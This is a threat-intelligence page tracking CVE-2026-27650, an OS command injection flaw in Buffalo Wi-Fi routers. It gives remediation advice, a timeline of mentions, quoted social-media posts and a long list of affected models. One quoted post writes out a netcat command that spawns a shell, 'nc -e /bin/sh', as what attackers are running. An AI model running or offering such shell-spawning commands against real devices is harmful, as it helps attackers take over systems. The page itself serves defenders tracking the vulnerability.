CVE-2026-27650Disclosure(buffalo / fs-m1266)

HIGHCVSS 9.8 · CRITICAL

Exploitation observed; activity peaked at 4 mentions and remains active

Immediate actions

  • Prioritize remediation for buffalo fs-m1266 systems immediately
  • Assume compromise if assets are exposed
  • Hunt for exploitation attempts and persistence artifacts
  • Track advisory updates for patch or workaround availability

Recommended action window: Immediate (within 24h)

NVD description

OS Command Injection vulnerability exists in BUFFALO Wi-Fi router products. If this vulnerability is exploited, an arbitrary OS command may be executed on the products.

6.0/ 10 priority

Sources & remediation

Weakness type (CWE)
CWE-78

Priority

HIGH

Exploitation

ACTIVE

PoC

NONE

Patch

NONE

Momentum

STABLE

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • fs-m1266
  • fs-m1266_firmware
  • fs-s1266
  • fs-s1266_firmware

Threat summary

  • Active exploitation appears in 1 classified signals
  • Exploit tooling references are present in monitored signal
  • 6 mentions across 3 observed days
  • Momentum state: stable

What's happening

  • Active exploitation reported across 1 signal
  • Exploit tool or code specified in 1 signal
  • Technical details provided in 4 signals
  • Disclosure: 4 classified signals
  • General: 1 classified signal
  • Peaked 2d ago at 4 mentions (2026-03-27); latest day: 1
  • 6 total mentions across 3 days

Affected systems

Vendors
Products
fs-m1266fs-m1266_firmwarefs-s1266fs-s1266_firmwarevr-u300wvr-u300w_firmwarevr-u500xvr-u500x_firmwarewapm-1266rwapm-1266r_firmware

1 version affected across 92 products

Deep dive

Activity timeline6 mentions / 3d
01234Mentions · 2026-03-27: 4Mentions · 2026-03-28: 1Mentions · 2026-04-09: 1Exploit Tool / Code · 2026-03-27: 1Active Exploitation · 2026-03-27: 1Technical Details · 2026-03-27: 3Technical Details · 2026-03-28: 103-2703-2804-09
Signal classification3 categories
Disclosure
466.7%
Active Exploitation
116.7%
General
116.7%
Referenced assets5 URLs
Classification over time
DateTotalLabels
2026-03-274
Active Exploitation1Disclosure3
2026-03-281
Disclosure1
2026-04-091
General1
Full discourse6 posts
  • CVE@CVEnew
    Disclosure

    CVE-2026-27650 OS Command Injection vulnerability exists in BUFFALO Wi-Fi router products. If this vulnerability is exploited, an arbitrary OS command may be executed on the product… https://www.cve.org/CVERecord?id=CVE-2026-27650

    Post summary

    The message announces the discovery of an OS Command Injection vulnerability (CVE‑2026‑27650) in Buffalo Wi‑Fi router products, highlighting the potential for arbitrary command execution, but provides no PoC, exploit details, or patch information.

    01020155
    56.9K followersView on X
  • CVEFind.com@CveFindCom
    Disclosure

    [CVE-2026-27650: HIGH] OS Command Injection vulnerability exists in BUFFALO Wi-Fi router products. If this vulnerability is exploited, an arbitrary OS command may be executed on the products.#cve,CVE-2026-27650,#cybersecurity https://cvefind.com/CVE-2026-27650

    Post summary

    The disclosure notes a high‑severity OS command injection (CVE‑2026‑27650) in BUFFALO Wi‑Fi routers that could allow arbitrary OS command execution.

    0000150
    617 followersView on X
  • IntegSec@integ_sec
    General

    CVE-2026-27650: Buffalo Wi-Fi Router OS Command Injection - What It Means for Your Business and How to Respond https://hubs.li/Q04bdqSh0

    Post summary

    The excerpt appears to be an informational article about CVE-2026-27650, describing a command‑injection flaw in Buffalo Wi‑Fi routers, but it does not provide any PoC, exploit code, or specific mitigation guidance.

    0000038
    28 followersView on X
  • The Hacker Wire@TheHackerWire
    Disclosure

    🟠 CVE-2026-27650 - High OS Command Injection vulnerability exists in BUFFALO Wi-Fi router products. If this vulnerability is exploited, an arbitrary OS command may be executed on the products. https://www.thehackerwire.com/vulnerability/CVE-2026-27650/ https://t.co/hEkBCE5rix

    Post summary

    A newly disclosed OS command injection flaw (CVE‑2026‑27650) in BUFFALO Wi‑Fi routers that could allow attackers to execute arbitrary OS commands.

    0000048
    163 followersView on X
  • White Rabbitx@TheRabbitPy
    Active Exploitation

    🏠 BUFFALO router owners after CVE-2026-27650: "It's fine, I only use it for guest WiFi" Attackers: *already running `nc -e /bin/sh 0.0.0.0 1337`* https://nvd.nist.gov/vuln/detail/CVE-2026-27650 #IoT #routerpwn

    Post summary

    The post indicates that CVE-2026-27650 is being actively exploited using a netcat-based reverse shell method, with no patch or mitigation details provided.

    0000043
    492 followersView on X
  • White Rabbitx@TheRabbitPy
    Disclosure

    🏠 BUFFALO WiFi router RCE (CVE-2026-27650) Remote unauth OS command injection via vulnerable endpoint. Default configs owned. Replace Buffalo gear or lock it down tight. https://nvd.nist.gov/vuln/detail/CVE-2026-27650 #CVE #router

    Post summary

    Buffalo WiFi router CVE‑2026‑27650 enables remote unauthenticated OS command injection through a vulnerable endpoint, potentially exposing default configurations.

    0000070
    492 followersView on X
CPE platform detail92 entries

92 of 92 entries

PartVendorProductVersionTarget SWTarget HW
HWbuffalofs-m1266---
OSbuffalofs-m1266_firmware---
HWbuffalofs-s1266---
OSbuffalofs-s1266_firmware---
HWbuffalovr-u300w---
OSbuffalovr-u300w_firmware---
HWbuffalovr-u500x---
OSbuffalovr-u500x_firmware---
HWbuffalowapm-1266r---
OSbuffalowapm-1266r_firmware---
HWbuffalowapm-1266wdpr---
OSbuffalowapm-1266wdpr_firmware---
HWbuffalowapm-1266wdpra---
OSbuffalowapm-1266wdpra_firmware---
HWbuffalowapm-1750d---
OSbuffalowapm-1750d_firmware---
HWbuffalowapm-2133r---
OSbuffalowapm-2133r_firmware---
HWbuffalowapm-2133tr---
OSbuffalowapm-2133tr_firmware---
HWbuffalowapm-ax4r---
OSbuffalowapm-ax4r_firmware---
HWbuffalowapm-ax8r---
OSbuffalowapm-ax8r_firmware---
HWbuffalowapm-axetr---
OSbuffalowapm-axetr_firmware---
HWbuffalowaps-1266---
OSbuffalowaps-1266_firmware---
HWbuffalowaps-ax4---
OSbuffalowaps-ax4_firmware---
HWbuffalowcr-1166dhpl---
OSbuffalowcr-1166dhpl_firmware---
HWbuffalowem-1266---
OSbuffalowem-1266_firmware---
HWbuffalowem-1266wp---
OSbuffalowem-1266wp_firmware---
HWbuffalowrm-d2133hp---
OSbuffalowrm-d2133hp_firmware---
HWbuffalowrm-d2133hs---
OSbuffalowrm-d2133hs_firmware---
HWbuffalowsr3600be4-kh---
OSbuffalowsr3600be4-kh_firmware---
HWbuffalowsr3600be4p---
OSbuffalowsr3600be4p_firmware---
HWbuffalowtr-m2133hp---
OSbuffalowtr-m2133hp_firmware---
HWbuffalowtr-m2133hs---
OSbuffalowtr-m2133hs_firmware---
HWbuffalowxr-1750dhp---
HWbuffalowxr-1750dhp2---
OSbuffalowxr-1750dhp2_firmware---
OSbuffalowxr-1750dhp_firmware---
HWbuffalowxr-1900dhp---
HWbuffalowxr-1900dhp2---
OSbuffalowxr-1900dhp2_firmware---
HWbuffalowxr-1900dhp3---
OSbuffalowxr-1900dhp3_firmware---
OSbuffalowxr-1900dhp_firmware---
HWbuffalowxr-5950ax12---
OSbuffalowxr-5950ax12_firmware---
HWbuffalowxr-6000ax12b---
OSbuffalowxr-6000ax12b_firmware---
HWbuffalowxr-6000ax12p---
OSbuffalowxr-6000ax12p_firmware---
HWbuffalowxr-6000ax12s---
OSbuffalowxr-6000ax12s_firmware---
HWbuffalowxr18000be10p---
OSbuffalowxr18000be10p_firmware---
HWbuffalowzr-1166dhp---
HWbuffalowzr-1166dhp2---
OSbuffalowzr-1166dhp2_firmware---
OSbuffalowzr-1166dhp_firmware---
HWbuffalowzr-1750dhp---
HWbuffalowzr-1750dhp2---
OSbuffalowzr-1750dhp2_firmware---
OSbuffalowzr-1750dhp_firmware---
HWbuffalowzr-600dhp---
HWbuffalowzr-600dhp2---
OSbuffalowzr-600dhp2_firmware---
HWbuffalowzr-600dhp3---
OSbuffalowzr-600dhp3_firmware---
OSbuffalowzr-600dhp_firmware---
HWbuffalowzr-900dhp---
HWbuffalowzr-900dhp2---
OSbuffalowzr-900dhp2_firmware---
OSbuffalowzr-900dhp_firmware---
HWbuffalowzr-s1750dhp---
OSbuffalowzr-s1750dhp_firmware---
HWbuffalowzr-s600dhp---
OSbuffalowzr-s600dhp_firmware---
HWbuffalowzr-s900dhp---
OSbuffalowzr-s900dhp_firmware---

Explore more